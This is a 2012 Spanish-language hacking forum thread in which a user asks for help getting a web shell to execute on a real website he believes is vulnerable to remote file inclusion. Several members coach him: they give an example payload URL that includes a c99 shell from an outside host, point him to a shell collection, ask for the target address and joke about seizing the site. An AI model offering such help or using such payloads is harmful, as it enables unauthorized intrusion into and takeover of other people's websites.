Sólo texto | Texto con Imágenes

Underc0de - La Casa de los Informáticos

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: munter en Octubre 07, 2012, 10:14:06 PM

Título: [SOLUCIONADO] Ayuda con RFI
Publicado por: munter en Octubre 07, 2012, 10:14:06 PM
hola amigos, tengo una duda, encontre uns sitio vulnerable a RFI, subi mi shell a unn hosting gratuito pero al inclirlo en la pag vulnerable no se ejecuta, me explico si la subo en .php si se ejecuta en mi servidor pero la subo .GIF y no se ejecta  que estare haciendo mal??
Título: Re:ayuda con RFI
Publicado por: Abnormality en Octubre 07, 2012, 10:25:33 PM
Tiene que ser .txt no .php
Título: Re:ayuda con RFI
Publicado por: wayver en Octubre 07, 2012, 10:27:26 PM
alomejor estan usando un servidor windows, sube una sell en asp
Título: Re:ayuda con RFI
Publicado por: munter en Octubre 07, 2012, 10:31:28 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Tiene que ser .txt no .php

la probe en .txt y nada, me da error , y pues si es php y server linux
Título: Re:ayuda con RFI
Publicado por: Abnormality en Octubre 07, 2012, 10:32:26 PM
lo incluiste utilizando un ? despues del .txt ?
Título: Re:ayuda con RFI
Publicado por: munter en Octubre 07, 2012, 10:35:47 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
lo incluiste utilizando un ? despues del .txt ?

te refieres q termi asi   mipag/shell.txt?    si es asi si  y nada
Título: Re:ayuda con RFI
Publicado por: Abnormality en Octubre 07, 2012, 10:38:34 PM
Claro, por ejemplo seria

www.ejemplo.com/index.php?file=http://www.pagina.com/c99.txt?


Estas seguro que es vulnerable a RFI? Porque?
Título: Re:ayuda con RFI
Publicado por: q3rv0 en Octubre 07, 2012, 10:42:31 PM
que error te tira??
Título: Re:ayuda con RFI
Publicado por: munter en Octubre 07, 2012, 10:47:26 PM
si se eecuta en mi servidor      en el de la pagina local nop (http://i50.tinypic.com/2ni6sqw.png)   en el servidor de la pagina vulnerable no se ejecuta, no se si me explique
Título: Re:ayuda con RFI
Publicado por: ANTRAX en Octubre 07, 2012, 10:49:06 PM
Pasa la url de la web vulnerable
Título: Re:ayuda con RFI
Publicado por: wayver en Octubre 07, 2012, 10:50:08 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Pasa la url de la web vulnerable

si la pasa todos se van a adueñar de ella... o por lomenos el quien la gane XD
Título: Re:ayuda con RFI
Publicado por: munter en Octubre 07, 2012, 10:59:46 PM
la paso al privado
Título: Re:ayuda con RFI
Publicado por: ANTRAX en Octubre 07, 2012, 11:24:15 PM
Como sabes que es vulnerable a LFI?
Título: Re:ayuda con RFI
Publicado por: munter en Octubre 07, 2012, 11:26:14 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Como sabes que es vulnerable a LFI?

a LFI no se a RIF sip   ha yesta en la imagen que monte, igual te envie la pag por privado
Título: Re:ayuda con RFI
Publicado por: Abnormality en Octubre 07, 2012, 11:29:09 PM
Proba incluir alguna de www.sh3ll.org y decime.
Título: Re:ayuda con RFI
Publicado por: ANTRAX en Octubre 07, 2012, 11:41:49 PM
Man, en la captura que subiste, sale la url de la web xD
Título: Re:ayuda con RFI
Publicado por: wayver en Octubre 07, 2012, 11:51:42 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Man, en la captura que subiste, sale la url de la web xD

jajajjaa apuesto que mas de uno penso que era publicidad XD
Título: Re:ayuda con RFI
Publicado por: ANTRAX en Octubre 07, 2012, 11:55:44 PM
De todas formas, y si es que no me equivoco, no tiene permisos. Por lo cual no te dejara ejecutar bien la shell
Título: Re:ayuda con RFI
Publicado por: Dedalo en Octubre 09, 2012, 05:15:27 PM
Es un iframe no un RFI.


Saludos,
Dedalo
Sólo texto | Texto con Imágenes